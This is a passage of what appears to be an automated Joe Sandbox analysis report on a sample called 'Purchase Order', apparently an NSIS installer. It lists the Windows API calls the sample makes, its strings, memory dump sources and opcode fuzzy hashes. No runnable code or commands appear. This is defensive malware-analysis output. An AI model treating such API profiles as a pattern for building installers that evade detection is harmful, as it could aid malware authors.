                                                                                                  • ExitProcess.KERNEL32 ref: 0040377F
                                                                                                    • Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                  • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                  • API String ID: 3329125770-3941163293
                                                                                                  • Opcode ID: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
                                                                                                  • Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
                                                                                                  • Opcode Fuzzy Hash: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
                                                                                                  • Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404AA5
                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404AB0
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404B0D
                                                                                                  • SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404B83
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404CDC
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404EAC
                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404EBC
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040505B
                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405066
                                                                                                  • ShowWindow.USER32(00000000), ref: 0040506D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
                                                                                                  • Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
                                                                                                  • Opcode Fuzzy Hash: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
                                                                                                  • Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387027047.0000000039D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d30000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                  • API String ID: 0-1947560563
                                                                                                  • Opcode ID: 0558264cbeced34392f93dd8771484de3ea8d7b8a1da03d9d4edb2cb115f7ef0
                                                                                                  • Instruction ID: f714439526e3af1839672da05b0ee7c39d512fabbd509dc45fa1635e54ca5778
                                                                                                  • Opcode Fuzzy Hash: 0558264cbeced34392f93dd8771484de3ea8d7b8a1da03d9d4edb2cb115f7ef0
                                                                                                  • Instruction Fuzzy Hash: 3D32A074E01218CFEB58CF69C985B9DBBB2BF89300F1085A9D809AB361DB755E85CF50
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(?,?,75923410,75922EE0,00000000), ref: 004057C2
                                                                                                  • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
                                                                                                  • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
                                                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
                                                                                                  • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405900
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: 8B$\*.*
                                                                                                  • API String ID: 2035342205-1085368084
                                                                                                  • Opcode ID: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                                                                                  • Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
                                                                                                  • Opcode Fuzzy Hash: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                                                                                  • Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387027047.0000000039D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d30000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                  • API String ID: 0-455001714
                                                                                                  • Opcode ID: cf1176daa66be8e73c239d58ba7ae49f3aba70f33a1533a1c0556580e9ae5a13
                                                                                                  • Instruction ID: 87b8b12bc5c5b7b410a312efc8056d7813d0abff5469254983da5fadba81a142
                                                                                                  • Opcode Fuzzy Hash: cf1176daa66be8e73c239d58ba7ae49f3aba70f33a1533a1c0556580e9ae5a13
                                                                                                  • Instruction Fuzzy Hash: 5402B0B4E012188FEB58CF69C985BDDBBB2BF89300F1081A9D409AB365DB355E85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                                                                                  • Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
                                                                                                  • Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                                                                                  • Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .5uq
                                                                                                  • API String ID: 0-910421107
                                                                                                  • Opcode ID: 7906c8ef2dca96c979f5533dc835e5a5edcc114acf835ae59923cd8d4cedf740
                                                                                                  • Instruction ID: ba5fc0353a7562219c0d6a37ce14a7444c4e8e30e0e2f7ae255733d78441052b
                                                                                                  • Opcode Fuzzy Hash: 7906c8ef2dca96c979f5533dc835e5a5edcc114acf835ae59923cd8d4cedf740
                                                                                                  • Instruction Fuzzy Hash: 72527C74A012298FDB68DF69C984BDDBBB2BF89300F1085E9D409A7255DB349EC2CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b00ba431ce47d6f60333c5479433d600866d9768c5f9c5a6c05c3d4b21a3409
                                                                                                  • Instruction ID: 816cea66f0bc1b3ed8d7609559165c5f9674ead598f7bb9e386bf822c3d04113
                                                                                                  • Opcode Fuzzy Hash: 0b00ba431ce47d6f60333c5479433d600866d9768c5f9c5a6c05c3d4b21a3409
                                                                                                  • Instruction Fuzzy Hash: 2A72B274E052298FDB65CF69C880BD9BBB6BF49300F5086E9D809AB355DB349E81DF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e0dc7c87836be97c88e0b9fcea00a03fa251321bbc9e6c2cd0c60cbba950263
                                                                                                  • Instruction ID: 659726683c701a5b5750479c82caef1b04962ba4dc7e811154b63e505f22f9db
                                                                                                  • Opcode Fuzzy Hash: 0e0dc7c87836be97c88e0b9fcea00a03fa251321bbc9e6c2cd0c60cbba950263
                                                                                                  • Instruction Fuzzy Hash: 5AD1B274E00218CFDB54DFA5D985B9DBBB2BF89300F5081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b34fd6d95a2fd5e2eff7d16788ddfb90daa89e4bbd6befa50ef4e3d52c243f96
                                                                                                  • Instruction ID: 3d0594b5040b581f7739bdc72061bcdf382c89f6cb8ce2475ac5ff9d198e8e37
                                                                                                  • Opcode Fuzzy Hash: b34fd6d95a2fd5e2eff7d16788ddfb90daa89e4bbd6befa50ef4e3d52c243f96
                                                                                                  • Instruction Fuzzy Hash: 1ED1A274E002188FDB54DFA5D981B9DBBB2BF89300F1081A9D808AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 32a1ef74c8131bca9e6643d089c447fcf1836695e531caba72481c5cb1fbcefa
                                                                                                  • Instruction ID: f818a7b39450593dfadbb0100d15100fe70c478053597714c3014fdf64d942c2
                                                                                                  • Opcode Fuzzy Hash: 32a1ef74c8131bca9e6643d089c447fcf1836695e531caba72481c5cb1fbcefa
                                                                                                  • Instruction Fuzzy Hash: 0BD1B174E01218CFDB54DFA5D981B9DBBB2BF89300F5081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3951c6c418d3386660e0a7a0f7a9dede78d0d615feb0605c9879809396fd09a9
                                                                                                  • Instruction ID: c61ac2731452103c0b8e298ba1476c5f8594f77fdb966595bce6fb36885857c3
                                                                                                  • Opcode Fuzzy Hash: 3951c6c418d3386660e0a7a0f7a9dede78d0d615feb0605c9879809396fd09a9
                                                                                                  • Instruction Fuzzy Hash: FFD1A074E013188FDB54DFA5D985B9DBBB2BF89300F1081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4fbbe4a3e6ec579eb76d52ff445bf6aee0f59916708b54dba7e591a87b261984
                                                                                                  • Instruction ID: 28fbb5c41e67e471555190c6cb4101563dd47a73277c36dcd3e76479d3182ef3
                                                                                                  • Opcode Fuzzy Hash: 4fbbe4a3e6ec579eb76d52ff445bf6aee0f59916708b54dba7e591a87b261984
                                                                                                  • Instruction Fuzzy Hash: 92D1B174E01218CFDB54DFA5D981B9DBBB2BF89300F1081A9D809AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 736c2d9dfdc75260ed9495750ba01567e71fa53f6ae0e2d1e94c9d2c26864fda
                                                                                                  • Instruction ID: 1acb2d9734f0083f251721f98a5176e09bbca854d88ff5629b05b5a087bf1528
                                                                                                  • Opcode Fuzzy Hash: 736c2d9dfdc75260ed9495750ba01567e71fa53f6ae0e2d1e94c9d2c26864fda
                                                                                                  • Instruction Fuzzy Hash: 7CD1B174E00218CFDB54DFA5D995B9DBBB2BF89300F1081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae1aefe19d0fa31245d358d38080162715f259d2dd6a47d75477f95e9cd1585b
                                                                                                  • Instruction ID: 6a43e6f6b3dd405a8a4a82d9c19ef368eeec799833967a023a073a76a8e3e41a
                                                                                                  • Opcode Fuzzy Hash: ae1aefe19d0fa31245d358d38080162715f259d2dd6a47d75477f95e9cd1585b
                                                                                                  • Instruction Fuzzy Hash: FCD1B275E01218CFDB54DFA5D981B9DBBB2BF89300F1081A9D808AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e588c7bc9307c156767009667f9d84d5fd749cd34cacaf6e5ec0e3d384e8e8c
                                                                                                  • Instruction ID: c6e695e5fd504eb68b2795bafd622d99bc8fec9534163ddc9d4c5ee794add52e
                                                                                                  • Opcode Fuzzy Hash: 6e588c7bc9307c156767009667f9d84d5fd749cd34cacaf6e5ec0e3d384e8e8c
                                                                                                  • Instruction Fuzzy Hash: FFD1C174E00218CFDB54DFA5D981B9DBBB2BF89300F5081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eaf00dac1ef10c31df6acd5a1d4641cbd3f61a3d5e75f3df37fd6f0febdf0e7c
                                                                                                  • Instruction ID: a24840e8c28b784744f161802c04372323dc6135307fdaa595b8397452a92565
                                                                                                  • Opcode Fuzzy Hash: eaf00dac1ef10c31df6acd5a1d4641cbd3f61a3d5e75f3df37fd6f0febdf0e7c
                                                                                                  • Instruction Fuzzy Hash: 46D1A274E01218CFDB54DFA9D981B9DBBB2BF89300F5081A9D808AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f646fd3b04d01fb449308dedd3687db186be575ebbf805f88d175591f562358d
                                                                                                  • Instruction ID: b9da5cae156661fa155b280c37f6d5da27b4b774c8ab096c01a0e7fff5f0bc50
                                                                                                  • Opcode Fuzzy Hash: f646fd3b04d01fb449308dedd3687db186be575ebbf805f88d175591f562358d
                                                                                                  • Instruction Fuzzy Hash: 83D1A374E013188FDB54DFA5D985B9DBBB2BF89300F1081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2449d1e6cebaf1d2f75f55d8041c0810cbb6847a0ec0ba9b0229b628f4c4dba8
                                                                                                  • Instruction ID: 907f8151f63873998aebcad71427ad222be02778fcc415847957325627fed332
                                                                                                  • Opcode Fuzzy Hash: 2449d1e6cebaf1d2f75f55d8041c0810cbb6847a0ec0ba9b0229b628f4c4dba8
                                                                                                  • Instruction Fuzzy Hash: DAD1A174E013188FDB54DFA5D981B9DBBB2BF89300F1081A9D809AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4450669a2ccc2cf087a0b9ad37a55c0d16be6b7c0b2fa5d500d23ce52a5aaf52
                                                                                                  • Instruction ID: a260028eb4d3ebae83d5c0a88c11ed8fd4ee7e31f49e935c834a43793d77f376
                                                                                                  • Opcode Fuzzy Hash: 4450669a2ccc2cf087a0b9ad37a55c0d16be6b7c0b2fa5d500d23ce52a5aaf52
                                                                                                  • Instruction Fuzzy Hash: B1D1A174E002188FDB54DFA5D981B9DBBB2BF89300F1081A9D808BB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 00dd30c8e8db9fdf19b1b962edf2d1190001a5b9cf710f1ba5f90aa69187068c
                                                                                                  • Instruction ID: bef9e8e2a2b170c18fe7f65150b9239884f35ea8b2bf9b0cf0fcbaf17f13ef0b
                                                                                                  • Opcode Fuzzy Hash: 00dd30c8e8db9fdf19b1b962edf2d1190001a5b9cf710f1ba5f90aa69187068c
                                                                                                  • Instruction Fuzzy Hash: 83D1AF74E003188FDB54DFA5D985B9DBBB2BF89300F5081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 686018ff4e7233add1a7e85ae5f5a1f68038b21e2395470ec7705ecf50b6414a
                                                                                                  • Instruction ID: a7dd346296333e503ba38a32b53d34d6c9a5405646d2beec14fb403d31fbe5bc
                                                                                                  • Opcode Fuzzy Hash: 686018ff4e7233add1a7e85ae5f5a1f68038b21e2395470ec7705ecf50b6414a
                                                                                                  • Instruction Fuzzy Hash: ECD1B274E00218CFDB54DFA5D991B9DBBB2BF89300F1081A9D809AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d06be6c20cf0ac47e8f9376acd9f4970fe7fb13d9a5d4812972cad07e454fc5b
                                                                                                  • Instruction ID: 8a2cb9e101fe3a6f16fe2d7631f99e2687a9ea79a9e3e87a71fd43bf7b1626a0
                                                                                                  • Opcode Fuzzy Hash: d06be6c20cf0ac47e8f9376acd9f4970fe7fb13d9a5d4812972cad07e454fc5b
                                                                                                  • Instruction Fuzzy Hash: 23D1B274E00218CFDB54DFA5D981B9DBBB2BF89300F1081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 78bf292dd08329e1ce119c3ef4fc8a4a1cef7addc37ee579c3fc66bb28717ff7
                                                                                                  • Instruction ID: 7fcfa439630c27ac2c978bfe841f51c57b593b346fb9917ea4ba65dab08771a5
                                                                                                  • Opcode Fuzzy Hash: 78bf292dd08329e1ce119c3ef4fc8a4a1cef7addc37ee579c3fc66bb28717ff7
                                                                                                  • Instruction Fuzzy Hash: BAD1AF75E012188FDB54DFA5D981B9DBBB2BF89300F1081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 794f6a311b7f75d77d8cd7863606b3b9ff5bc6533f363eb44e346fa36facadac
                                                                                                  • Instruction ID: 42616ef3b8e66e04249add4163d95d922dac49e6ba9c89aebf67edf68afe0a9b
                                                                                                  • Opcode Fuzzy Hash: 794f6a311b7f75d77d8cd7863606b3b9ff5bc6533f363eb44e346fa36facadac
                                                                                                  • Instruction Fuzzy Hash: C1D1A074E01218CFDB54DFA5D981B9DBBB2BF89300F1081A9D808AB365DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
